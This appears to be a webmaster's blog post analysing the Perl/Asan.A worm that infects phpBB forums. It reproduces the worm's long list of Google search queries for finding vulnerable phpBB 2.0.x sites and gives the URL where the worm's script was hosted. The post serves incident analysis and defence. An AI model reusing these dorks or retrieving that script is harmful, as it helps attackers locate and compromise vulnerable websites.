Botnet Perl/Asan.A.worm Mining Google and Infecting phpBB

Finally got in touch with one of the owners of a server that was hacked and actively mounting the botnet attack and got some good information. There was a file installed on the server called gugl.txt which was a Perl script that had an active load running on the server when it was shutdown.

Took about 5 seconds to glance at this file and it's obvious I was absolutely correct about how they were finding vulnerable sites using Google as the primary data mining facility. The only thing I found a bit odd is why they were using Google Japan "www.google.co.jp" when the other evidence I found pointed to Google Turkey, perhaps 2 different hackers or worms, perhaps just spreading the load around so Google won't notice, who knows.

The file they download to your server to locate more vulnerable servers is here:

http://lawhelper.com.ua/gugl.txt

When I opened the file my virus scanner claimed it was a Perl.Asan virus so I did a bit of research and Panda claims it's the Perl/Asan.A.worm or something similar, that locates and infects phpBB systems.

Here's the searches in human readable form that gugl.txt was using to look for vulnerabilities:

"posting.php?mode=newtopic" "viewtopic.php?t=" "viewtopic"+"&view=previous" "Powered+By+phpBB+2.0.4" "Powered+By+phpBB+2.0.5" "Powered+By+phpBB+2.0.6" "Powered+By+phpBB+2.0.7" "Powered+By+phpBB+2.0.8" "Powered+By+phpBB+2.0.9" "Powered+By+phpBB+2.0.10" "Powered+By+phpBB+2.0.10" "Powered+By+phpBB+2.0.11" "Powered+By+phpBB+2.0.2" "Powered+By+phpBB+2.0.1" "Powered+by+phpbb+2.0.10".com "Powered+by+phpbb+2.0.8".com "Powered+by+phpbb+2.0.6".com "Powered+by+phpbb+2.0.10".net "Powered+by+phpbb+2.0.6".net "Powered+by+phpbb+2.0.8".de "Powered+by+phpbb+2.0.6".de "Powered+by+phpbb+2.0.10".de "Powered+by+phpbb+2.0.8".be "Powered+by+phpbb+2.0.6".be "Powered+by+phpbb+2.0.10".be "Powered+by+phpbb+2.0.8".ca "Powered+by+phpbb+2.0.6".ca "Powered+by+phpbb+2.0.10".ca "Powered+by+phpbb+2.0.8".org "Powered+by+phpbb+2.0.6".org "Powered+by+phpbb+2.0.10".org "Powered+by+phpbb+2.0.6"foro "Powered+by+phpbb+2.0.8"foro "Powered+by+phpbb+2.0.10"foro "Powered+by+phpbb+2.0.6"forum "Powered+by+phpbb+2.0.8"forum "Powered+by+phpbb+2.0.10"forum "Powered+by+phpbb+2.0.6"phpbb "Powered+by+phpbb+2.0.8"phpbb "Powered+by+phpbb+2.0.10"phpbb "test+forum+1"+"phpbb"+"2.0.6" "test+forum+1"+"phpbb"+"2.0.8" "test+forum+1"+"phpbb"+"2.0.10" "welcome+to+phpbb+2"+"phpbb"+"2.0.6" "welcome+to+phpbb+2"+"phpbb"+"2.0.8" "Powered+by+phpbb+2.0.8".us "Powered+by+phpbb+2.0.6".us "Powered+by+phpbb+2.0.10".us "Powered+by+phpbb+2.0.8".tw "Powered+by+phpbb+2.0.6".tw "Powered+by+phpbb+2.0.10".tw "Powered+by+phpbb+2.0.8".cn "Powered+by+phpbb+2.0.6".cn "Powered+by+phpbb+2.0.10".cn "Powered+by+phpbb+2.0.8".hk "Powered+by+phpbb+2.0.6".hk "Powered+by+phpbb+2.0.10".hk "Powered+by+phpbb+2.0.8".se "Powered+by+phpbb+2.0.6".se "Powered+by+phpbb+2.0.10".se "Powered+by+phpbb+2.0.8".ar "Powered+by+phpbb+2.0.6".ar "Powered+by+phpbb+2.0.10".ar "Powered+by+phpbb+2.0.8".at "Powered+by+phpbb+2.0.6".at "Powered+by+phpbb+2.0.10".at "Powered+by+phpbb+2.0.8".uy "Powered+by+phpbb+2.0.6".uy "Powered+by+phpbb+2.0.10".uy "Powered+by+phpbb+2.0.8".cz "Powered+by+phpbb+2.0.6".cz "Powered+by+phpbb+2.0.10".cz "Powered+by+phpbb+2.0.8".kr "Powered+by+phpbb+2.0.6".kr "Powered+by+phpbb+2.0.10".kr "Powered+by+phpbb+2.0.8".jp "Powered+by+phpbb+2.0.6".jp "Powered+by+phpbb+2.0.10".jp "Powered+by+phpbb+2.0.8".dk "Powered+by+phpbb+2.0.6".dk "Powered+by+phpbb+2.0.10".dk "Powered+by+phpbb+2.0.8".yu "Powered+by+phpbb+2.0.6".yu "Powered+by+phpbb+2.0.10".yu "Powered+by+phpbb+2.0.8".my "Powered+by+phpbb+2.0.6".my "Powered+by+phpbb+2.0.10".my "Powered+by+phpbb+2.0.8".info "Powered+by+phpbb+2.0.6".info "Powered+by+phpbb+2.0.10".info "Powered+by+phpbb+2.0.8".gr "Powered+by+phpbb+2.0.6".gr "Powered+by+phpbb+2.0.10".gr "Powered+by+phpbb+2.0.8".uk "Powered+by+phpbb+2.0.6".uk "Powered+by+phpbb+2.0.10".uk "Powered+by+phpbb+2.0.8".pe "Powered+by+phpbb+2.0.6".pe "Powered+by+phpbb+2.0.10".pe "Powered+by+phpbb+2.0.8".co "Powered+by+phpbb+2.0.6".co "Powered+by+phpbb+2.0.10".co "Powered+by+phpbb+2.0.8".ve "Powered+by+phpbb+2.0.6".ve "Powered+by+phpbb+2.0.10".ve "Powered+by+phpbb+2.0.8".cl "Powered+by+phpbb+2.0.6".cl "Powered+by+phpbb+2.0.10".cl "Powered+by+phpbb+2.0.8".py "Powered+by+phpbb+2.0.6".py "Powered+by+phpbb+2.0.8".bo "Powered+by+phpbb+2.0.6".bo "Powered+by+phpbb+2.0.10".bo "Powered+by+phpbb+2.0.8".ec "Powered+by+phpbb+2.0.6".ec "Powered+by+phpbb+2.0.10".ec "Powered+by+phpbb+2.0.8".mx "Powered+by+phpbb+2.0.6".mx "Powered+by+phpbb+2.0.10".mx "Powered+by+phpbb+2.0.8".fi "Powered+by+phpbb+2.0.6".fi "Powered+by+phpbb+2.0.10".fi "Powered+by+phpbb+2.0.8".si "Powered+by+phpbb+2.0.6".si "Powered+by+phpbb+2.0.10".si "Powered+by+phpbb+2.0.8".ch "Powered+by+phpbb+2.0.6".ch "Powered+by+phpbb+2.0.10".ch "Powered+by+phpbb+2.0.8".es "Powered+by+phpbb+2.0.6".es "Powered+by+phpbb+2.0.10".es "Powered+by+phpbb+2.0.8".fr "Powered+by+phpbb+2.0.6".fr "Powered+by+phpbb+2.0.10".fr "Powered+by+phpbb+2.0.8".br "Powered+by+phpbb+2.0.6".br "Powered+by+phpbb+2.0.10".br "Powered+by+phpbb+2.0.8".ru "Powered+by+phpbb+2.0.6".ru "Powered+by+phpbb+2.0.10".ru "Powered+by+phpbb+2.0.8".ro "Powered+by+phpbb+2.0.6".ro "Powered+by+phpbb+2.0.10".ro "Powered+by+phpbb+2.0.8".biz "Powered+by+phpbb+2.0.6".biz "Powered+by+phpbb+2.0.10".biz "Powered+by+phpbb+2.0.8".ni "Powered+by+phpbb+2.0.6".ni "Powered+by+phpbb+2.0.10".ni "Powered+by+phpbb+2.0.8".edu "Powered+by+phpbb+2.0.6".edu "Powered+by+phpbb+2.0.10".edu "Powered+by+phpbb+2.0.8".gov "Powered+by+phpbb+2.0.6".gov "Powered+by+phpbb+2.0.10".gov "Powered+by+phpbb+2.0.8".aero "Powered+by+phpbb+2.0.6".aero "Powered+by+phpbb+2.0.10".aero "Powered+by+phpbb+2.0.8".mil "Powered+by+phpbb+2.0.6".mil "Powered+by+phpbb+2.0.10".mil "Powered+by+phpbb+2.0.8".fm "Powered+by+phpbb+2.0.6".fm "Powered+by+phpbb+2.0.10".fm "Powered+by+phpbb+2.0.8".ie "Powered+by+phpbb+2.0.6".ie "Powered+by+phpbb+2.0.10".ie "Powered+by+phpbb+2.0.8".ir "Powered+by+phpbb+2.0.6".ir "Powered+by+phpbb+2.0.10".ir "Powered+by+phpbb+2.0.8".hr "Powered+by+phpbb+2.0.6".hr "Powered+by+phpbb+2.0.10".hr "Powered+by+phpbb+2.0.8".hu "Powered+by+phpbb+2.0.6".hu "Powered+by+phpbb+2.0.10".hu "Powered+by+phpbb+2.0.8".za "Powered+by+phpbb+2.0.6".za "Powered+by+phpbb+2.0.10".za "2.0.4+©+2001,"+topic+View+2.0.4" "2.0.5+©+2001,"+topic+View+2.0.5" "2.0.6+©+2001,"+topic+View+2.0.6" "2.0.7+©+2001,"+topic+View+2.0.7" "2.0.8+©+2001,"+topic+View+2.0.8" "2.0.9+©+2001,"+topic+View+2.0.9" "2*0.4+©+2001-"+topic+View+2.0.10" "2*0.5+©+2001-"+topic+View" "2*0.6+©+2001-"+topic+View" "2*0.7+©+2001-"+topic+View" "2*0.8+©+2001-"+topic+View" "2*0.9+©+2001-"+topic+View" "2-0-5+©+2001."+topic+View" "2-0-5+©+2001."+topic+View" "2-0-5+©+2001."+topic+View" "2-0-5+©+2001."+topic+View" "2-0-5+©+2001."+topic+View" "2.0.10+"inurl:".pt"+"phpbb"+"2.0.6" "inurl:".pt"+"phpbb"+"2.0.8" "inurl:".pt"+"phpbb"+"2.0.10" "inurl:".tz"+"phpbb"+"2.0.6" "inurl:".tz"+"phpbb"+"2.0.8" "inurl:".tz"+"phpbb"+"2.0.10" "inurl:".tr"+"phpbb"+"2.0.6" "inurl:".tr"+"phpbb"+"2.0.8" "inurl:".tr"+"phpbb"+"2.0.10" "inurl:".cc"+"phpbb"+"2.0.6" "inurl:".cc"+"phpbb"+"2.0.8" "inurl:".cc"+"phpbb"+"2.0.10" "inurl:".it"+"phpbb"+"2.0.6" "inurl:".it"+"phpbb"+"2.0.8" "inurl:".it"+"phpbb"+"2.0.10" "inurl:".au"+"phpbb"+"2.0.6" "inurl:".au"+"phpbb"+"2.0.8" "inurl:".au"+"phpbb"+"2.0.10" "inurl:".nz"+"phpbb"+"2.0.6" "inurl:".nz"+"phpbb"+"2.0.8" "inurl:".nz"+"phpbb"+"2.0.10" "inurl:".ee"+"phpbb"+"2.0.6" "inurl:".ee"+"phpbb"+"2.0.8" "inurl:".ee"+"phpbb"+"2.0.10" "inurl:".il"+"phpbb"+"2.0.6" "inurl:".il"+"phpbb"+"2.0.8" "inurl:".il"+"phpbb"+"2.0.10" "inurl:".jm"+"phpbb"+"2.0.6" "inurl:".jm"+"phpbb"+"2.0.8" "inurl:".jm"+"phpbb"+"2.0.10" "inurl:".lv"+"phpbb"+"2.0.6" "inurl:".lv"+"phpbb"+"2.0.8" "inurl:".lv"+"phpbb"+"2.0.10" "inurl:".mg"+"phpbb"+"2.0.6" "inurl:".mg"+"phpbb"+"2.0.8" "inurl:".mg"+"phpbb"+"2.0.10" "inurl:".lt"+"phpbb"+"2.0.6" "inurl:".lt"+"phpbb"+"2.0.8" "inurl:".lt"+"phpbb"+"2.0.10" "inurl:".ma"+"phpbb"+"2.0.6" "inurl:".ma"+"phpbb"+"2.0.8" "inurl:".ma"+"phpbb"+"2.0.10" "inurl:".ws"+"phpbb"+"2.0.6" "inurl:".ws"+"phpbb"+"2.0.8" "inurl:".ws"+"phpbb"+"2.0.10" "inurl:".com"+"phpbb"+"2.0.6" "inurl:".com"+"phpbb"+"2.0.8" "inurl:".com"+"phpbb"+"2.0.10" "inurl:".my"+"phpbb"+"2.0.6" "inurl:".my"+"phpbb"+"2.0.8" "inurl:".my"+"phpbb"+"2.0.10" "inurl:".no"+"phpbb"+"2.0.6" "inurl:".no"+"phpbb"+"2.0.8" "inurl:".no"+"phpbb"+"2.0.10" "inurl:".no"+"phpbb"+"2.0.6" "inurl:".net"+"phpbb"+"2.0.8" "inurl:".net"+"phpbb"+"2.0.10" "inurl:".net"+"phpbb"+"2.0.6" "inurl:".cx"+"phpbb"+"2.0.6" "inurl:".cx"+"phpbb"+"2.0.8" "inurl:".cx"+"phpbb"+"2.0.10" "inurl:".org"+"phpbb"+"2.0.6" "inurl:".org"+"phpbb"+"2.0.8" "inurl:".org"+"phpbb"+"2.0.10" "inurl:".in"+"phpbb"+"2.0.6" "inurl:".in"+"phpbb"+"2.0.8" "inurl:".in"+"phpbb"+"2.0.10" "inurl:".nl"+"phpbb"+"2.0.6" "inurl:".nl"+"phpbb"+"2.0.8" "inurl:".nl"+"phpbb"+"2.0.10" "welcome+to+phpbb+2"+"phpbb"+"2.0.10" "Powered+by+phpBB"+v-i-e-w-t-o-p-i-c-.-p-h-p "P-o-w-e-r-e-d+b-y+p-h-p-B-B" viewtopic.php+"by+phpBB+2001" viewtopic.php+"by+phpBB+2000" viewtopic.php+"by+phpBB+2002" viewtopic.php+by+phpBB+2003" viewtopic.php+"by+phpBB+2004" "ALEKS+HACKED+YOUR+SYSTEM" viewtopic.php+"by+phpBB+2005" viewtopic.php+"by+phpBB+2006"intitle:"::+View+topic" viewtopic.php+"+phpBB+Group" "topic.php?t=""::+View+topic" viewtopic.php?t "View+next+topic" "View+previous+topic" "edit+topic+in+this+forum"+topic+2.0.4+ "edit+topic+in+this+forum"+topic+2.0.5+ "edit+topic+in+this+forum"+topic+2.0.6+ "edit+topic+in+this+forum"+topic+2.0.7+ "edit+topic+in+this+forum"+topic+2.0.8+ "edit+topic+in+this+forum"+topic+2.0.9+ "edit+topic+in+this+forum"+topic+2.0.10+ "All+times+are+GMT"+topic+2.0.4+ "All+times+are+GMT"+topic+2.0.5+ "All+times+are+GMT"+topic+2.0.6+ "All+times+are+GMT"+topic+2.0.7+ "All+times+are+GMT"+topic+2.0.8+ "All+times+are+GMT"+topic+2.0.9+ "All+times+are+GMT"+topic+2.0.10+ "All+times+are+GMT"+topic+2.0.10+ by+phpbb+2.0.4+topic+"Jump+to:"+"You+cannot" by+phpbb+2.0.5+topic+"Jump+to:"+"You+cannot" by+phpbb+2.0.6+topic+"Jump+to:"+"You+cannot" by+phpbb+2.0.7+topic+"Jump+to:"+"You+cannot" by+phpbb+2.0.8+topic+"Jump+to:"+"You+cannot" by+phpbb+2.0.9+topic+"Jump+to:"+"You+cannot" by+phpbb+2.0.10+topic+"Jump+to:"+"You+cannot" "0.4+©+2001,+2002"+next+ "0.5+©+2001,+2002"+next+ "0.6+©+2001,+2002"+next+ "0.7+©+2001,+2002"+next+ "0.8+©+2001,+2002"+next+ "0.9+©+2001,+2002"+next+ "0.10+©+2001,+2002"+next+ "delete+your+posts+in+this+forum"+topic+2.0.4+ "delete+your+posts+in+this+forum"+topic+2.0.5+ "delete+your+posts+in+this+forum"+topic+2.0.6+ "delete+your+posts+in+this+forum"+topic+2.0.7+ "delete+your+posts+in+this+forum"+topic+2.0.8+ "delete+your+posts+in+this+forum"+topic+2.0.9+ "delete+your+posts+in+this+forum"+topic+2.0.10+ viewtopic+2.0.4+ viewtopic+2.0.5+ viewtopic+2.0.6+ viewtopic+2.0.7+ viewtopic+2.0.8+ viewtopic+2.0.9+ viewtopic+2.0.10+ by+phpBB+2.0.4+ by+phpBB+2.0.5+ by+phpBB+2.0.6+ by+phpBB+2.0.7+ by+phpBB+2.0.8+ by+phpBB+2.0.9+ by+phpBB+2.0.10+ "You+cannot+vote+in+polls+in+this+forum"+2.0.4+ "You+cannot+vote+in+polls+in+this+forum"+2.0.5+ "You+cannot+vote+in+polls+in+this+forum"+2.0.6+ "You+cannot+vote+in+polls+in+this+forum"+2.0.7+ "You+cannot+vote+in+polls+in+this+forum"+2.0.8+ "You+cannot+vote+in+polls+in+this+forum"+2.0.9+ "You+cannot+vote+in+polls+in+this+forum"+2.0.10+ "View+topic"+2.0.4+ "View+topic"+2.0.5+ "View+topic"+2.0.6+ "View+topic"+2.0.7+ "View+topic"+2.0.8+ "View+topic"+2.0.9+ "View+topic"+2.0.10+ "View+topic"+2.0.4+ "View+topic"+2.0.5+ "View+topic"+2.0.6+ "View+topic"+2.0.7+ "View+topic"+2.0.8+ "View+topic"+2.0.9+ "View+topic"+2.0.10+ "powered+by"+php+view+0.8+2001+2002+"group"+board+"cannot+post" "powered+by"+php+view+2001+2003+"group"+board+"cannot+post" "powered+by"+php+view+2001+2002+"group"+board+"cannot+post" "powered+by"+php+view+0.4+2001+2002+"group"+board+"cannot+post" "powered+by"+php+view+0.5+2001+2002+"group"+board+"cannot+post" "powered+by"+php+view+0.6+2001+2002+"group"+board+"cannot+post" "powered+by"+php+view+0.7+2001+2002+"group"+board+"cannot+post" "powered+by"+php+view+0.9+2001+2002+"group"+board+"cannot+post" "powered+by"+php+view+0.10+2001+2002+"group"+board+"cannot+post"

Google likes to claim they "Do No Evil" but sure allow themselves to be used for evil.

Would it be too much to ask that Google plug some holes or block some types of searches to stop these worms from finding vulnerable websites?

Come on guys, with all your Billion$ you should be able to have a few security experts on hand, maybe working in conjunction with Panda, Symantec and such, that keep on top of these specific threats and block the specific searches used to locate vulnerable sites.

Not just Google either, they were just the search engine in the center of this particular attack, but the other search engines like Yahoo, Ask and MSN should be blocking access to this stuff as well.

Technically, my server is only under attack because Google showed one of these worms that the phrase "PhotoCart" existed somewhere in my server, and it's not even the software these idiot hackers and looking for in the first place.

Gee thanks Google, like I needed this problem.

Sheesh.

At least now I know what I'm up against.